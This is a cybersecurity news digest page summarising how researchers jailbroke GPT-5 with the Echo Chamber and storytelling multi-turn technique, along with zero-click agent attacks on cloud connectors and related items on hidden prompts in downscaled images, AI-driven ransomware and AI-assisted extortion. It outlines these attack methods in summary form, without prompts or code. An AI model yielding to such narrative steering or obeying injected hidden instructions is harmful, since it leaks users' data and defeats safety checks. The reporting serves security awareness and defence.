CyberHappenings logo
☰

GPT-5 Jailbreak and Zero-Click AI Agent Attacks on Cloud and IoT Systems

First reported
Last updated
📰 2 unique sources, 2 articles

Summary

Hide ▲

Researchers have discovered a jailbreak technique to bypass GPT-5's ethical guardrails, leveraging Echo Chamber and narrative-driven steering to produce harmful content. Additionally, zero-click AI agent attacks have been identified, targeting cloud and IoT systems, exploiting vulnerabilities in AI connectors and integrations. The Echo Chamber technique manipulates GPT-5 by seeding a poisonous conversational context and guiding the model with subtle storytelling, avoiding explicit intent signaling. This method has been combined with Crescendo to bypass defenses in other AI models. Zero-click attacks, such as AgentFlayer, exploit AI agents connected to cloud services and code repositories, leading to data exfiltration and unauthorized access. These attacks highlight the risks of integrating AI models with external systems, increasing the potential attack surface and introducing new security vulnerabilities. Researchers successfully jailbroke GPT-5 within 24 hours of its release using the Echo Chamber and Storytelling technique, demonstrating the ongoing vulnerability of LLMs to multi-turn attacks.

Timeline

  1. 11.08.2025 19:46 📰 1 articles

    GPT-5 Jailbreak Demonstrated Using Echo Chamber and Storytelling

    Researchers from NeuralTrust successfully jailbroke GPT-5 within 24 hours of its release using the Echo Chamber and Storytelling technique. The attack required only three turns and did not use unsafe language in the initial prompts. The technique leverages narrative continuity and urgency to bypass safety mechanisms, demonstrating the ongoing vulnerability of LLMs to multi-turn attacks. The Echo Chamber technique can also be applied to previous versions of OpenAI's GPT, Google's Gemini, and Grok-4. NeuralTrust has offered to share their findings with OpenAI to help address these vulnerabilities.

    Show sources
  2. 09.08.2025 18:06 📰 1 articles

    GPT-5 Jailbreak and Zero-Click AI Agent Attacks Disclosed

    Researchers have uncovered a jailbreak technique for GPT-5, leveraging Echo Chamber and narrative-driven steering to produce harmful content. Additionally, zero-click AI agent attacks have been identified, targeting cloud and IoT systems. These attacks exploit vulnerabilities in AI connectors and integrations, leading to data exfiltration and unauthorized access.

    Show sources

Information Snippets

Similar Happenings

HexStrike AI Exploits Citrix Vulnerabilities Disclosed in August 2025

Threat actors have begun using HexStrike AI to exploit Citrix vulnerabilities disclosed in August 2025. HexStrike AI, an AI-driven security platform, was designed to automate reconnaissance and vulnerability discovery for authorized red teaming operations, but it has been repurposed for malicious activities. The exploitation attempts target three Citrix vulnerabilities, with some threat actors offering access to vulnerable NetScaler instances for sale on darknet forums. The use of HexStrike AI by threat actors significantly reduces the time between vulnerability disclosure and exploitation, increasing the risk of widespread attacks. The tool's automation capabilities allow for continuous exploitation attempts, enhancing the likelihood of successful breaches. Security experts emphasize the urgency of patching and hardening affected systems to mitigate the risks posed by this AI-driven threat. HexStrike AI's client features a retry logic and recovery handling to mitigate the effects of failures in any individual step on its complex operations. HexStrike AI has been open-source and available on GitHub for the last month, where it has already garnered 1,800 stars and over 400 forks. Hackers started discussing HexStrike AI on hacking forums within hours of the Citrix vulnerabilities disclosure. HexStrike AI has been used to automate the exploitation chain, including scanning for vulnerable instances, crafting exploits, delivering payloads, and maintaining persistence. Check Point recommends defenders focus on early warning through threat intelligence, AI-driven defenses, and adaptive detection.

AI-Powered Cyberattacks Targeting Critical Sectors Disrupted

Anthropic disrupted an AI-powered operation in July 2025 that used its Claude AI chatbot to conduct large-scale theft and extortion across 17 organizations in healthcare, emergency services, government, and religious sectors. The actor used Claude Code on Kali Linux to automate various phases of the attack cycle, including reconnaissance, credential harvesting, and network penetration. The operation, codenamed GTG-2002, employed AI to make tactical and strategic decisions, exfiltrating sensitive data and demanding ransoms ranging from $75,000 to $500,000 in Bitcoin. The actor used AI to craft bespoke versions of the Chisel tunneling utility to evade detection and disguise malicious executables as legitimate Microsoft tools. The operation highlights the increasing use of AI in cyberattacks, making defense and enforcement more challenging. Anthropic developed new detection methods to prevent future abuse of its AI models.

AI-Driven Ransomware Strain PromptLock Discovered

A new ransomware strain named PromptLock has been identified by ESET researchers. This strain leverages AI to generate malicious scripts in real-time, making it more difficult to detect and defend against. PromptLock is currently in development and has not been observed in active attacks. It can exfiltrate files, encrypt data, and is being upgraded to destroy files. The ransomware uses the gpt-oss:20b model from OpenAI via the Ollama API and is written in Go, targeting Windows, Linux, and macOS systems. The Bitcoin address associated with PromptLock appears to belong to Satoshi Nakamoto. PromptLock uses Lua scripts generated from hard-coded prompts to enumerate the local filesystem, inspect target files, exfiltrate selected data, and perform encryption. The ransomware can generate custom ransom notes based on the type of infected machine and uses the SPECK 128-bit encryption algorithm to lock files. PromptLock is assessed to be a proof-of-concept (PoC) rather than a fully operational malware deployed in the wild.

AI systems vulnerable to data-theft via hidden prompts in downscaled images

Researchers at Trail of Bits have demonstrated a new attack method that exploits image downscaling in AI systems to steal user data. The attack injects hidden prompts in full-resolution images that become visible when the images are resampled to lower quality. These prompts are interpreted by AI models as user instructions, potentially leading to data leakage or unauthorized actions. The vulnerability affects multiple AI systems, including Google Gemini CLI, Vertex AI Studio, Google Assistant on Android, and Genspark. The attack works by embedding instructions in images that are only revealed when the images are downscaled using specific resampling algorithms. The AI model then interprets these hidden instructions as part of the user's input, executing them without the user's knowledge. The researchers have developed an open-source tool, Anamorpher, to create images for testing this vulnerability. To mitigate the risk, Trail of Bits recommends implementing dimension restrictions on image uploads, providing users with previews of downscaled images, and requiring explicit user confirmation for sensitive tool calls.

UNC5518 deploys CORNFLAKE.V3 backdoor via ClickFix and fake CAPTCHA pages

UNC5518, an access-as-a-service threat actor, deploys the CORNFLAKE.V3 backdoor using the ClickFix social engineering tactic and fake CAPTCHA pages. This backdoor is used by at least two other groups, UNC5774 and UNC4108, to initiate multi-stage infections and drop additional payloads. The attack begins with users being tricked into running a malicious PowerShell script via a fake CAPTCHA page. The script executes a dropper payload that ultimately launches CORNFLAKE.V3, which supports various payload types and collects system information. The backdoor has been observed in both JavaScript and PHP versions and uses Cloudflare tunnels to avoid detection. A new ClickFix variant manipulates AI-generated text summaries to deliver malicious commands, turning AI tools into active participants in social engineering attacks.